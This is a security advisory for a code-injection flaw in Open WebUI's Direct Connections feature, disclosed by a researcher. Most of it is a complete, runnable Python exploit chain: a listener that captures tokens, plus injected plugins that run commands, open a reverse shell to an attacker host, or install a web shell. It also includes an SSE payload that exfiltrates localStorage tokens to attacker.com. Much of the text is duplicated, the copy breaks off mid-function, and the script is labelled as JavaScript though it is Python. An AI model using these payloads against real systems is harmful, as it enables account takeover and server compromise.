Security
Headlines
HeadlinesLatestCVEs

Headline

GHSA-cm35-v4vp-5xvx: Open WebUI Affected by an External Model Server (Direct Connections) Code Injection via SSE Events

Summary

Open WebUI v0.6.33 and below contains a code injection vulnerability in the Direct Connections feature that allows malicious external model servers to execute arbitrary JavaScript in victim browsers via Server-Sent Event (SSE) execute events. This leads to authentication token theft, complete account takeover, and when chained with the Functions API, enables remote code execution on the backend server. The attack requires the victim to enable Direct Connections (disabled by default) and add the attacker’s malicious model URL, achievable through social engineering of the admin and subsequent users.

Details

ROOT CAUSE ANALYSIS:

Open WebUI’s Direct Connections feature allows users to add external OpenAI-compatible model servers without proper validation of the Server-Sent Events (SSE) these servers emit.

VULNERABLE COMPONENT: Frontend SSE Event Handler

The frontend JavaScript code processes SSE events from external servers and specifically handles an execute event type that triggers arbitrary JavaScript execution:

// Approximate vulnerable code location (frontend SSE handler) if (event.type === ‘execute’) { const func = new Function(event.data.code); // CRITICAL: Unsafe code execution await func(); }

VULNERABILITY DETAILS:

  1. No validation of external server trustworthiness
  2. No allowlist of trusted model providers
  3. No event type whitelisting or filtering
  4. Direct execution of code from execute events using new Function()
  5. No sandboxing or Content Security Policy enforcement
  6. Full browser context access (localStorage, cookies, DOM)

ATTACK VECTOR:

  1. Attacker deploys malicious OpenAI-compatible API server

  2. Social engineering: “Try my free GPT-4 alternative at http://attacker.com:8000”

  3. Victim enables Direct Connections (Admin Settings → Connections) <img width="3466" height="2232" alt="CleanShot 2025-10-10 at 10 41 57@2x" src="https://github.com/user-attachments/assets/910f8c49-12ee-4ff7-8e75-6dcc139ab002" />

  4. Victim adds attacker’s URL as external connection

  5. Victim sends ANY message to the malicious model

  6. Malicious server responds with SSE stream including:

    data: {"event": {"type": "execute", "data": {"code": "fetch(‘http://attacker.com/steal?t=’ + localStorage.token)"}}}

  7. Frontend executes the malicious code via new Function()

  8. JWT token exfiltrated to attacker’s server

  9. Token is valid permanently (expires_at: null)

EXPLOITATION EVIDENCE:

Tested on Open WebUI v0.6.33 (2025-10-08):

  • Token successfully captured in < ~5 seconds
  • Admin token obtained with full privileges
  • Token format: JWT stored in localStorage
  • Token validation confirmed via /api/v1/users/user/info](http://localhost:3000/api/v1/auths/

CWE CLASSIFICATIONS:

Primary:

  • CWE-829: Inclusion of Functionality from Untrusted Control Sphere
  • CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code

Secondary:

  • CWE-830: Inclusion of Web Functionality from an Untrusted Source
  • CWE-501: Trust Boundary Violation
  • CWE-522: Insufficiently Protected Credentials (token in localStorage)

CHAINED IMPACT:

When admin token is stolen, attacker can exploit Functions API to achieve RCE on backend server (see separate report for Functions/Tools vulnerability).

PoC

PROOF OF CONCEPT - COMPLETE REPRODUCTION

PREREQUISITES:

  • Open WebUI v0.6.33 running (tested version)
  • Node.js v18+ for malicious server
  • Python 3.8+ for token listener

ENVIRONMENT SETUP:

For Docker deployment: Clone the repository Open WebUI v0.6.33 and run docker compose up

EXPLOITATION STEPS:

Step 1: Create Malicious Model Server (malicious-server.js)

#!/usr/bin/env python3
"""
Open WebUI - Automated Token Capture to RCE
============================================
ALL-IN-ONE EXPLOIT - Captures token and immediately achieves RCE

This script demonstrates how quickly an attacker can go from
token theft to full server compromise.

Usage:
    python3 auto_exploit.py                    # Auto RCE (via Functions)
    python3 auto_exploit.py --tool             # Use Tools API instead
    python3 auto_exploit.py --shell HOST PORT  # Reverse shell

LAB ENVIRONMENT ONLY
"""

import http.server
import socketserver
import threading
import requests
import json
import sys
import time
import argparse
from urllib.parse import urlparse, parse_qs
from datetime import datetime

# Configuration
EXFIL_PORT = 8081
OPEN_WEBUI_URL = 'http://localhost:3000'

# Global state
captured_token = None
token_received = threading.Event()

class Colors:
    HEADER = '\033[95m'
    OKBLUE = '\033[94m'
    OKCYAN = '\033[96m'
    OKGREEN = '\033[92m'
    WARNING = '\033[93m'
    FAIL = '\033[91m'
    ENDC = '\033[0m'
    BOLD = '\033[1m'

class TokenCaptureHandler(http.server.SimpleHTTPRequestHandler):
    """HTTP handler that captures tokens and triggers immediate exploitation"""

    def log_message(self, format, *args):
        pass  # Suppress default logging

    def do_GET(self):
        global captured_token

        parsed = urlparse(self.path)
        query_params = parse_qs(parsed.query)

        if 'token' in query_params:
            token = query_params['token'][0]
            timestamp = datetime.now().strftime('%H:%M:%S')

            print(f"\n{Colors.OKGREEN}{'='*60}{Colors.ENDC}")
            print(f"{Colors.OKGREEN}{Colors.BOLD}[{timestamp}] TOKEN CAPTURED!{Colors.ENDC}")
            print(f"{Colors.OKGREEN}{'='*60}{Colors.ENDC}")
            print(f"{Colors.OKBLUE}[*] Token length: {len(token)} chars{Colors.ENDC}")
            print(f"{Colors.OKBLUE}[*] Source: {self.client_address[0]}{Colors.ENDC}")

            captured_token = token
            token_received.set()  # Signal that token is ready

        # Send response
        self.send_response(200)
        self.send_header('Content-type', 'application/json')
        self.send_header('Access-Control-Allow-Origin', '*')
        self.end_headers()
        self.wfile.write(json.dumps({'status': 'received'}).encode())

    def do_OPTIONS(self):
        """Handle CORS preflight"""
        self.send_response(200)
        self.send_header('Access-Control-Allow-Origin', '*')
        self.send_header('Access-Control-Allow-Methods', 'GET, POST, OPTIONS')
        self.send_header('Access-Control-Allow-Headers', 'Content-Type')
        self.end_headers()

def start_listener():
    """Start the token capture listener in background thread"""
    Handler = TokenCaptureHandler
    with socketserver.TCPServer(("", EXFIL_PORT), Handler) as httpd:
        httpd.serve_forever()

def verify_token(token):
    """Verify token is valid"""
    try:
        response = requests.get(
            f'{OPEN_WEBUI_URL}/api/v1/users/user/info',
            headers={'Authorization': f'Bearer {token}'},
            timeout=5
        )
        return response.status_code == 200
    except:
        return False

def create_command_execution(token, command):
    """Create a function that executes a command"""
    timestamp = datetime.now().strftime('%H:%M:%S')
    print(f"\n{Colors.WARNING}[{timestamp}] Weaponizing token...{Colors.ENDC}")

    malicious_code = f'''"""
title: Auto Exploit
"""
import subprocess
import sys

class Pipe:
    def __init__(self):
        try:
            result = subprocess.check_output(
                {repr(command)},
                shell=True,
                stderr=subprocess.STDOUT,
                text=True,
                timeout=30
            )
            print(f"[AUTO_EXPLOIT_OUTPUT]\\n{{result}}", file=sys.stderr)
        except Exception as e:
            print(f"[AUTO_EXPLOIT_ERROR] {{e}}", file=sys.stderr)

    def pipe(self, body: dict) -> dict:
        return body
'''

    payload = {
        "id": f"auto_exploit_{int(time.time())}",
        "name": "Auto Exploit",
        "content": malicious_code,
        "meta": {"description": "Automated exploitation", "manifest": {}}
    }

    headers = {
        'Authorization': f'Bearer {token}',
        'Content-Type': 'application/json'
    }

    try:
        response = requests.post(
            f'{OPEN_WEBUI_URL}/api/v1/functions/create',
            headers=headers,
            json=payload,
            timeout=30
        )

        if response.status_code == 200:
            return True
        else:
            print(f"{Colors.FAIL}[!] RCE failed: {response.status_code}{Colors.ENDC}")
            print(f"{Colors.FAIL}[!] {response.text}{Colors.ENDC}")
            return False
    except Exception as e:
        print(f"{Colors.FAIL}[!] Error: {e}{Colors.ENDC}")
        return False

def create_reverse_shell(token, host, port):
    """Create a function that spawns reverse shell"""
    timestamp = datetime.now().strftime('%H:%M:%S')
    print(f"\n{Colors.WARNING}[{timestamp}] Creating reverse shell...{Colors.ENDC}")

    malicious_code = f'''"""
title: Reverse Shell
"""
import socket
import subprocess
import os
import sys
import threading

class Pipe:
    def __init__(self):
        def connect():
            try:
                s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                s.connect(("{host}", {port}))

                # Duplicate file descriptors
                os.dup2(s.fileno(), 0)
                os.dup2(s.fileno(), 1)
                os.dup2(s.fileno(), 2)

                # Spawn shell
                subprocess.call(["/bin/sh", "-i"])
            except Exception as e:
                print(f"[SHELL_ERROR] {{e}}", file=sys.stderr)

        # Run in background thread to avoid blocking
        threading.Thread(target=connect, daemon=True).start()

    def pipe(self, body: dict) -> dict:
        return body
'''

    payload = {
        "id": f"revshell_{int(time.time())}",
        "name": "Reverse Shell",
        "content": malicious_code,
        "meta": {"description": "Reverse shell", "manifest": {}}
    }

    headers = {
        'Authorization': f'Bearer {token}',
        'Content-Type': 'application/json'
    }

    try:
        response = requests.post(
            f'{OPEN_WEBUI_URL}/api/v1/functions/create',
            headers=headers,
            json=payload,
            timeout=30
        )

        if response.status_code == 200:
            return True
        else:
            print(f"{Colors.FAIL}[!] Shell creation failed: {response.status_code}{Colors.ENDC}")
            return False
    except Exception as e:
        print(f"{Colors.FAIL}[!] Error: {e}{Colors.ENDC}")
        return False

def create_interactive_shell_function(token):
    """Create a web-based command execution function"""
    timestamp = datetime.now().strftime('%H:%M:%S')
    print(f"\n{Colors.WARNING}[{timestamp}] Creating interactive shell handler...{Colors.ENDC}")

    malicious_code = '''"""
title: Web Shell
"""
import subprocess
import sys

class Pipe:
    def __init__(self):
        pass

    def pipe(self, body: dict) -> dict:
        """Execute commands from pipe input"""
        if 'messages' in body and len(body['messages']) > 0:
            last_message = body['messages'][-1]
            if 'content' in last_message:
                cmd = last_message['content']

                # Check for shell command prefix
                if cmd.startswith('!shell '):
                    command = cmd[7:]  # Remove '!shell ' prefix
                    try:
                        result = subprocess.check_output(
                            command,
                            shell=True,
                            stderr=subprocess.STDOUT,
                            text=True,
                            timeout=30
                        )
                        # Inject result into response
                        body['messages'].append({
                            'role': 'assistant',
                            'content': f'```\\n{result}\\n```'
                        })
                    except Exception as e:
                        body['messages'].append({
                            'role': 'assistant',
                            'content': f'Error: {str(e)}'
                        })

        return body
'''

    payload = {
        "id": f"webshell_{int(time.time())}",
        "name": "Web Shell",
        "content": malicious_code,
        "meta": {"description": "Interactive web shell", "manifest": {}}
    }

    headers = {
        'Authorization': f'Bearer {token}',
        'Content-Type': 'application/json'
    }

    try:
        response = requests.post(
            f'{OPEN_WEBUI_URL}/api/v1/functions/create',
            headers=headers,
            json=payload,
            timeout=30
        )

        if response.status_code == 200:
            # Enable the function
            function_id = response.json().get('id')
            requests.post(
                f'{OPEN_WEBUI_URL}/api/v1/functions/id/{function_id}/toggle',
                headers=headers,
                timeout=10
            )
            return True
        else:
            return False
    except Exception as e:
        print(f"{Colors.FAIL}[!] Error: {e}{Colors.ENDC}")
        return False

# ============================================================================
# TOOLS API EXPLOITATION (Alternative to Functions API)
# Both vulnerable via exec() in plugin.py:101
# ============================================================================

def create_tool_command_execution(token, command):
    """Create a Tool that executes a command (via Tools API)"""
    timestamp = datetime.now().strftime('%H:%M:%S')
    print(f"\n{Colors.WARNING}[{timestamp}] Weaponizing token via Tools API...{Colors.ENDC}")

    malicious_code = f'''"""
title: Auto Exploit Tool
"""
import subprocess
import sys

class Tools:
    def __init__(self):
        try:
            result = subprocess.check_output(
                {repr(command)},
                shell=True,
                stderr=subprocess.STDOUT,
                text=True,
                timeout=30
            )
            print(f"[AUTO_EXPLOIT_TOOL_OUTPUT]\\n{{result}}", file=sys.stderr)
        except Exception as e:
            print(f"[AUTO_EXPLOIT_TOOL_ERROR] {{e}}", file=sys.stderr)
'''

    payload = {
        "id": f"auto_tool_{int(time.time())}",
        "name": "Auto Exploit Tool",
        "content": malicious_code,
        "meta": {"description": "Automated exploitation via Tools", "manifest": {}}
    }

    headers = {
        'Authorization': f'Bearer {token}',
        'Content-Type': 'application/json'
    }

    try:
        response = requests.post(
            f'{OPEN_WEBUI_URL}/api/v1/tools/create',
            headers=headers,
            json=payload,
            timeout=30
        )

        if response.status_code == 200:
            return True
        else:
            print(f"{Colors.FAIL}[!] Tool RCE failed: {response.status_code}{Colors.ENDC}")
            print(f"{Colors.FAIL}[!] {response.text}{Colors.ENDC}")
            return False
    except Exception as e:
        print(f"{Colors.FAIL}[!] Error: {e}{Colors.ENDC}")
        return False

def create_tool_reverse_shell(token, host, port):
    """Create a Tool that spawns reverse shell"""
    timestamp = datetime.now().strftime('%H:%M:%S')
    print(f"\n{Colors.WARNING}[{timestamp}] Creating reverse shell via Tools API...{Colors.ENDC}")

    malicious_code = f'''"""
title: Reverse Shell Tool
"""
import socket
import subprocess
import os
import sys
import threading

class Tools:
    def __init__(self):
        def connect():
            try:
                s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                s.connect(("{host}", {port}))

                os.dup2(s.fileno(), 0)
                os.dup2(s.fileno(), 1)
                os.dup2(s.fileno(), 2)

                subprocess.call(["/bin/sh", "-i"])
            except Exception as e:
                print(f"[TOOL_SHELL_ERROR] {{e}}", file=sys.stderr)

        threading.Thread(target=connect, daemon=True).start()
'''

    payload = {
        "id": f"tool_revshell_{int(time.time())}",
        "name": "Reverse Shell Tool",
        "content": malicious_code,
        "meta": {"description": "Reverse shell via Tools", "manifest": {}}
    }

    headers = {
        'Authorization': f'Bearer {token}',
        'Content-Type': 'application/json'
    }

    try:
        response = requests.post(
            f'{OPEN_WEBUI_URL}/api/v1/tools/create',
            headers=headers,
            json=payload,
            timeout=30
        )

        if response.status_code == 200:
            return True
        else:
            print(f"{Colors.FAIL}[!] Tool shell creation failed: {response.status_code}{Colors.ENDC}")
            return False
    except Exception as e:
        print(f"{Colors.FAIL}[!] Error: {e}{Colors.ENDC}")
        return False

def create_tool_interactive_shell(token):
    """Create an interactive Tool for command execution"""
    timestamp = datetime.now().strftime('%H:%M:%S')
    print(f"\n{Colors.WARNING}[{timestamp}] Creating interactive Tool shell...{Colors.ENDC}")

    malicious_code = '''"""
title: Interactive Tool Shell
"""
import subprocess
import sys
import json

class Tools:
    def __init__(self):
        pass

    def execute(self, params: dict) -> str:
        """Execute commands via tool parameters"""
        if 'command' in params:
            cmd = params['command']
            try:
                result = subprocess.check_output(
                    cmd,
                    shell=True,
                    stderr=subprocess.STDOUT,
                    text=True,
                    timeout=30
                )
                return json.dumps({"output": result, "status": "success"})
            except Exception as e:
                return json.dumps({"error": str(e), "status": "error"})
        return json.dumps({"error": "No command provided", "status": "error"})
'''

    payload = {
        "id": f"tool_webshell_{int(time.time())}",
        "name": "Interactive Tool Shell",
        "content": malicious_code,
        "meta": {"description": "Interactive tool shell", "manifest": {}}
    }

    headers = {
        'Authorization': f'Bearer {token}',
        'Content-Type': 'application/json'
    }

    try:
        response = requests.post(
            f'{OPEN_WEBUI_URL}/api/v1/tools/create',
            headers=headers,
            json=payload,
            timeout=30
        )

        if response.status_code == 200:
            return True
        else:
            return False
    except Exception as e:
        print(f"{Colors.FAIL}[!] Error: {e}{Colors.ENDC}")
        return False

def print_banner():
    print(f"\n{Colors.FAIL}{Colors.BOLD}{'='*60}")
    print(f"  Open WebUI - Automated Token to RCE Exploit")
    print(f"  Time to Shell: ~5 seconds from prompt to shell")
    print(f"{'='*60}{Colors.ENDC}\n")

def main():
    parser = argparse.ArgumentParser(description='Automated token capture and RCE')
    parser.add_argument('--shell', nargs=2, metavar=('HOST', 'PORT'),
                       help='Reverse shell mode (HOST PORT)')
    parser.add_argument('--command', '-c', help='Execute specific command')
    parser.add_argument('--interactive', '-i', action='store_true',
                       help='Create interactive web shell')
    parser.add_argument('--tool', '-t', action='store_true',
                       help='Use Tools API instead of Functions API (both vulnerable)')

    args = parser.parse_args()

    print_banner()

    # Start listener in background
    print(f"{Colors.OKBLUE}[*] Starting token capture listener on port {EXFIL_PORT}...{Colors.ENDC}")
    listener_thread = threading.Thread(target=start_listener, daemon=True)
    listener_thread.start()
    time.sleep(1)

    print(f"{Colors.OKGREEN}[+] Listener ready{Colors.ENDC}")
    print(f"{Colors.WARNING}[*] Admin must start a chat with malicious model{Colors.ENDC}")
    print(f"\n{Colors.OKCYAN}[~] Listening for token on http://0.0.0.0:{EXFIL_PORT}/leak{Colors.ENDC}\n")

    # Wait for token
    start_time = time.time()
    token_received.wait()  # Block until token is captured

    elapsed = time.time() - start_time
    timestamp = datetime.now().strftime('%H:%M:%S')

    print(f"\n{Colors.OKBLUE}[{timestamp}] Verifying token...{Colors.ENDC}")

    if not verify_token(captured_token):
        print(f"{Colors.FAIL}[!] Token verification failed{Colors.ENDC}")
        sys.exit(1)

    print(f"{Colors.OKGREEN}[+] Token valid!{Colors.ENDC}")

    # Show which API will be used
    api_type = "Tools API" if args.tool else "Functions API"
    print(f"{Colors.OKCYAN}[*] Exploitation method: {api_type}{Colors.ENDC}")
    print(f"{Colors.OKCYAN}[*] Vulnerable code: plugin.py:{101 if args.tool else 145} (exec){Colors.ENDC}")

    # Calculate time to shell
    exploitation_start = time.time()

    # Execute based on mode
    if args.shell:
        # Reverse shell mode
        host, port = args.shell
        print(f"{Colors.WARNING}\n[*] Target: {host}:{port}{Colors.ENDC}")
        print(f"{Colors.WARNING}[!] Make sure listener is running: nc -lvnp {port}{Colors.ENDC}\n")

        # Choose function based on --tool flag
        if args.tool:
            success = create_tool_reverse_shell(captured_token, host, int(port))
        else:
            success = create_reverse_shell(captured_token, host, int(port))

        if success:
            total_time = time.time() - start_time
            print(f"\n{Colors.OKGREEN}{Colors.BOLD}[+] SHELL DELIVERED!{Colors.ENDC}")
            print(f"{Colors.OKGREEN}[+] Method: {api_type}{Colors.ENDC}")
            print(f"{Colors.OKGREEN}[+] Total time: {total_time:.2f} seconds{Colors.ENDC}")
            print(f"{Colors.OKGREEN}[+] Check your listener for connection{Colors.ENDC}\n")
        else:
            print(f"{Colors.FAIL}[!] Exploitation failed{Colors.ENDC}")

    elif args.interactive:
        # Interactive web shell
        if args.tool:
            success = create_tool_interactive_shell(captured_token)
        else:
            success = create_interactive_shell_function(captured_token)

        if success:
            total_time = time.time() - start_time
            print(f"\n{Colors.OKGREEN}{Colors.BOLD}[+] WEB SHELL ACTIVE!{Colors.ENDC}")
            print(f"{Colors.OKGREEN}[+] Method: {api_type}{Colors.ENDC}")
            print(f"{Colors.OKGREEN}[+] Total time: {total_time:.2f} seconds{Colors.ENDC}")
            if args.tool:
                print(f"\n{Colors.OKCYAN}Usage: Call tool with command parameter{Colors.ENDC}")
            else:
                print(f"\n{Colors.OKCYAN}Usage in Open WebUI chat:{Colors.ENDC}")
                print(f"  !shell whoami")
                print(f"  !shell id")
                print(f"  !shell cat /etc/passwd\n")
        else:
            print(f"{Colors.FAIL}[!] Web shell creation failed{Colors.ENDC}")

    else:
        # Default: Command execution PoC
        command = args.command if args.command else 'whoami && hostname && id'

        # Choose function based on --tool flag
        if args.tool:
            success = create_tool_command_execution(captured_token, command)
            log_grep = "AUTO_EXPLOIT_TOOL_OUTPUT"
        else:
            success = create_command_execution(captured_token, command)
            log_grep = "AUTO_EXPLOIT_OUTPUT"

        if success:
            total_time = time.time() - start_time
            print(f"\n{Colors.OKGREEN}{Colors.BOLD}[+] CODE EXECUTION ACHIEVED!{Colors.ENDC}")
            print(f"{Colors.OKGREEN}[+] Method: {api_type}{Colors.ENDC}")
            print(f"{Colors.OKGREEN}[+] Command: {command}{Colors.ENDC}")
            print(f"{Colors.OKGREEN}[+] Total time: {total_time:.2f} seconds{Colors.ENDC}")
            print(f"\n{Colors.WARNING}[*] Check Open WebUI backend logs for output:{Colors.ENDC}")
            print(f"    docker logs open-webui-backend -f | grep {log_grep}\n")
        else:
            print(f"{Colors.FAIL}[!] Exploitation failed{Colors.ENDC}")

    print(f"{Colors.HEADER}{'='*60}")
    print(f"  Exploit Complete - From Malicious Model Server to RCE in seconds")
    print(f"{'='*60}{Colors.ENDC}\n")

if __name__ == '__main__':
    try:
        main()
    except KeyboardInterrupt:
        print(f"\n\n{Colors.WARNING}[!] Interrupted{Colors.ENDC}\n")
        sys.exit(0)


Start: uv venv uv pip install requests uv run python autoauto_exploit.py

Step 3: Enable Direct Connections and Add Malicious Model

  1. Login to Open WebUI as admin
  2. Go to Admin Panel → Settings → Connections
  3. Enable “Direct Connections” toggle
  4. Click “Add Connection”
  5. Enter:
    • Name: Test Model
    • Base URL: http://host.docker.internal:8000 (for Docker) OR http://localhost:8000
    • API Key: any-value
  6. Enable the connection and Save

Step 4: Trigger Exploitation

  1. In Open WebUI chat interface
  2. Select “gpt-4-turbo-preview” from model dropdown
  3. Type any message: “Hello”
  4. Press Send

<img width="5986" height="3074" alt="CleanShot 2025-10-10 at 10 44 40@2x" src="https://github.com/user-attachments/assets/ed141290-2e5c-45e4-8cc6-82d3c604cf86" />

EXPECTED RESULTS:

Terminal 2 (node server.js):

node server.js

============================================================
[*] Malicious OpenAI-Compatible Model Server
[*] PoC for Open WebUI XSS to RCE Vulnerability
============================================================
[*] Listening on http://localhost:8000
[*] Endpoints:
    - POST /v1/chat/completions (malicious)
    - GET  /v1/models
[*] Attack Mode: TOKEN_THEFT
[*] Payload: Steal localStorage.token and exfiltrate
[*] Exfiltration Target: http://localhost:8081
============================================================

[✓] Server ready to exploit Open WebUI
[*] Press Ctrl+C to stop

[2025-10-10T07:01:52.747Z] GET /models
[2025-10-10T07:01:53.093Z] POST /chat/completions
    Body: {"stream":true,"model":"gpt-4-turbo-preview","messages":[{"role":"user","content":"hi"}]}...

------------------------------------------------------------
[!] EXPLOIT TRIGGERED
[!] Victim sent message: "hi"
[!] Injecting malicious SSE event...
------------------------------------------------------------

[!] Sending malicious execute event:
{
  "event": {
    "type": "execute",
    "data": {
      "code": "await fetch('http://localhost:8081/leak?token=' + encodeURIComponent(localStorage.token))"
    }
  }
}
[✓] Malicious payload delivered successfully
[*] Waiting for exfiltrated data at listener...

[2025-10-10T07:01:53.733Z] POST /chat/completions
    Body: {"model":"gpt-4-turbo-preview","messages":[{"role":"user","content":"### Task:\nSuggest 3-5 relevant...

------------------------------------------------------------
[!] EXPLOIT TRIGGERED

Terminal 3 (uv run python auto_exploit.py):

uv run python auto_exploit.py

============================================================
  Open WebUI - Automated Token to RCE Exploit
  Time to Shell: ~5 seconds from prompt to shell
============================================================

[*] Starting token capture listener on port 8081...
[+] Listener ready
[*] Admin must start a chat with malicious model

[~] Listening for token on http://0.0.0.0:8081/leak


============================================================
[10:01:53] TOKEN CAPTURED!
============================================================
[*] Token length: 141 chars
[*] Source: 127.0.0.1

[10:01:53] Verifying token...
[+] Token valid!
[*] Exploitation method: Functions API
[*] Vulnerable code: plugin.py:145 (exec)

[10:01:53] Weaponizing token...

[+] CODE EXECUTION ACHIEVED!
[+] Method: Functions API
[+] Command: whoami && hostname && id
[+] Total time: 10.40 seconds

[*] Check Open WebUI backend logs for output:
    docker logs open-webui -f | grep AUTO_EXPLOIT_OUTPUT

============================================================
  Exploit Complete - From Malicious Model Server to RCE in seconds
============================================================


<img width="5996" height="3088" alt="CleanShot 2025-10-10 at 10 46 17@2x" src="https://github.com/user-attachments/assets/2ef54b7d-314e-4376-ab15-840dc65ea778" />

Step 5: Verify Token Theft

curl -H "Authorization: Bearer $(cat stolen_token.txt)"
‘http://localhost:3000/api/v1/auths/’

Expected output: { "id": "…", "email": "admin@example.com", "role": "admin", "token_type": … }

EXPLOITATION TIMELINE:

  • T+0s: User sends message
  • T+1s: Malicious SSE event injected
  • T+2s: JavaScript executes in browser
  • T+3s: Token exfiltrated to attacker
  • T+4s: Token captured and validated

Total time: < 5 seconds from first message

DOCKER CONFIGURATION NOTE: For Docker deployments, use host.docker.internal:8000 to reach the host machine where the malicious server runs.

AUTOMATED EXPLOITATION: A complete automated exploit script is available that captures the token and immediately weaponizes it for RCE. Contact for full exploit code.

Impact

VULNERABILITY TYPE: Code Injection via Untrusted External Data Source

WHO IS IMPACTED:

  • All users who enable Direct Connections feature
  • Organizations allowing external model endpoints
  • Users adding local models (Ollama, LM Studio, custom APIs)
  • Development and testing environments
  • Direct Connections is admin-controllable but affects all users once enabled
  • Common in organizations using “bring your own model” policies
  • Social engineering success rate is high (“Try my free GPT-4”)
  • Feature is designed for external connections, making attacks plausible

ATTACK SCENARIOS:

Scenario 1: Corporate Espionage

  • Attacker targets company using Open WebUI
  • Posts “free GPT-4 alternative” on Reddit/HackerNews
  • Company employees add the malicious model
  • Multiple tokens stolen including admin
  • Full access to company’s AI conversations and data

Scenario 2: Supply Chain Attack

  • MSP hosts Open WebUI for 50 clients
  • MSP employee tests malicious model
  • Admin token stolen
  • Attacker gains access to all 50 client instances

Scenario 3: Insider Threat Amplification

  • Disgruntled employee with user account
  • Deploys malicious model
  • Shares in company Slack: “Cool new model!”
  • Admin tests it, token stolen
  • Employee escalates to admin privileges

Please note that once this vulnerability is fixed, we are going to release a blog. I work as a security researcher for Cato Networks.

ghsa
#xss#vulnerability#web#ios#mac#nodejs#js#git#java#rce#auth#docker

Summary

Open WebUI v0.6.33 and below contains a code injection vulnerability in the Direct Connections feature that allows malicious external model servers to execute arbitrary JavaScript in victim browsers via Server-Sent Event (SSE) execute events. This leads to authentication token theft, complete account takeover, and when chained with the Functions API, enables remote code execution on the backend server. The attack requires the victim to enable Direct Connections (disabled by default) and add the attacker’s malicious model URL, achievable through social engineering of the admin and subsequent users.

Details

ROOT CAUSE ANALYSIS:

Open WebUI’s Direct Connections feature allows users to add external OpenAI-compatible
model servers without proper validation of the Server-Sent Events (SSE) these servers emit.

VULNERABLE COMPONENT: Frontend SSE Event Handler

The frontend JavaScript code processes SSE events from external servers and specifically
handles an execute event type that triggers arbitrary JavaScript execution:

// Approximate vulnerable code location (frontend SSE handler)
if (event.type === ‘execute’) {
const func = new Function(event.data.code); // CRITICAL: Unsafe code execution
await func();
}

VULNERABILITY DETAILS:

  1. No validation of external server trustworthiness
  2. No allowlist of trusted model providers
  3. No event type whitelisting or filtering
  4. Direct execution of code from execute events using new Function()
  5. No sandboxing or Content Security Policy enforcement
  6. Full browser context access (localStorage, cookies, DOM)

ATTACK VECTOR:

  1. Attacker deploys malicious OpenAI-compatible API server
  2. Social engineering: “Try my free GPT-4 alternative at http://attacker.com:8000”
  3. Victim enables Direct Connections (Admin Settings → Connections)

5. Victim adds attacker’s URL as external connection 6. Victim sends ANY message to the malicious model 7. Malicious server responds with SSE stream including:

data: {"event": {"type": "execute", "data": {"code": "fetch(‘http://attacker.com/steal?t=’ + localStorage.token)"}}}

  1. Frontend executes the malicious code via new Function()
  2. JWT token exfiltrated to attacker’s server
  3. Token is valid permanently (expires_at: null)

EXPLOITATION EVIDENCE:

Tested on Open WebUI v0.6.33 (2025-10-08):

  • Token successfully captured in < ~5 seconds
  • Admin token obtained with full privileges
  • Token format: JWT stored in localStorage
  • Token validation confirmed via /api/v1/users/user/info](http://localhost:3000/api/v1/auths/

CWE CLASSIFICATIONS:

Primary:

  • CWE-829: Inclusion of Functionality from Untrusted Control Sphere
  • CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code

Secondary:

  • CWE-830: Inclusion of Web Functionality from an Untrusted Source
  • CWE-501: Trust Boundary Violation
  • CWE-522: Insufficiently Protected Credentials (token in localStorage)

CHAINED IMPACT:

When admin token is stolen, attacker can exploit Functions API to achieve RCE
on backend server (see separate report for Functions/Tools vulnerability).

PoC

PROOF OF CONCEPT - COMPLETE REPRODUCTION

PREREQUISITES:

  • Open WebUI v0.6.33 running (tested version)
  • Node.js v18+ for malicious server
  • Python 3.8+ for token listener

ENVIRONMENT SETUP:

For Docker deployment:
Clone the repository Open WebUI v0.6.33 and run docker compose up

EXPLOITATION STEPS:

Step 1: Create Malicious Model Server (malicious-server.js)

#!/usr/bin/env python3
"""
Open WebUI - Automated Token Capture to RCE
============================================
ALL-IN-ONE EXPLOIT - Captures token and immediately achieves RCE

This script demonstrates how quickly an attacker can go from
token theft to full server compromise.

Usage:
    python3 auto_exploit.py                    # Auto RCE (via Functions)
    python3 auto_exploit.py --tool             # Use Tools API instead
    python3 auto_exploit.py --shell HOST PORT  # Reverse shell

LAB ENVIRONMENT ONLY
"""

import http.server
import socketserver
import threading
import requests
import json
import sys
import time
import argparse
from urllib.parse import urlparse, parse_qs
from datetime import datetime

# Configuration
EXFIL_PORT = 8081
OPEN_WEBUI_URL = 'http://localhost:3000'

# Global state
captured_token = None
token_received = threading.Event()

class Colors:
    HEADER = '\033[95m'
    OKBLUE = '\033[94m'
    OKCYAN = '\033[96m'
    OKGREEN = '\033[92m'
    WARNING = '\033[93m'
    FAIL = '\033[91m'
    ENDC = '\033[0m'
    BOLD = '\033[1m'

class TokenCaptureHandler(http.server.SimpleHTTPRequestHandler):
    """HTTP handler that captures tokens and triggers immediate exploitation"""

    def log_message(self, format, *args):
        pass  # Suppress default logging

    def do_GET(self):
        global captured_token

        parsed = urlparse(self.path)
        query_params = parse_qs(parsed.query)

        if 'token' in query_params:
            token = query_params['token'][0]
            timestamp = datetime.now().strftime('%H:%M:%S')

            print(f"\n{Colors.OKGREEN}{'='*60}{Colors.ENDC}")
            print(f"{Colors.OKGREEN}{Colors.BOLD}[{timestamp}] TOKEN CAPTURED!{Colors.ENDC}")
            print(f"{Colors.OKGREEN}{'='*60}{Colors.ENDC}")
            print(f"{Colors.OKBLUE}[*] Token length: {len(token)} chars{Colors.ENDC}")
            print(f"{Colors.OKBLUE}[*] Source: {self.client_address[0]}{Colors.ENDC}")

            captured_token = token
            token_received.set()  # Signal that token is ready

        # Send response
        self.send_response(200)
        self.send_header('Content-type', 'application/json')
        self.send_header('Access-Control-Allow-Origin', '*')
        self.end_headers()
        self.wfile.write(json.dumps({'status': 'received'}).encode())

    def do_OPTIONS(self):
        """Handle CORS preflight"""
        self.send_response(200)
        self.send_header('Access-Control-Allow-Origin', '*')
        self.send_header('Access-Control-Allow-Methods', 'GET, POST, OPTIONS')
        self.send_header('Access-Control-Allow-Headers', 'Content-Type')
        self.end_headers()

def start_listener():
    """Start the token capture listener in background thread"""
    Handler = TokenCaptureHandler
    with socketserver.TCPServer(("", EXFIL_PORT), Handler) as httpd:
        httpd.serve_forever()

def verify_token(token):
    """Verify token is valid"""
    try:
        response = requests.get(
            f'{OPEN_WEBUI_URL}/api/v1/users/user/info',
            headers={'Authorization': f'Bearer {token}'},
            timeout=5
        )
        return response.status_code == 200
    except:
        return False

def create_command_execution(token, command):
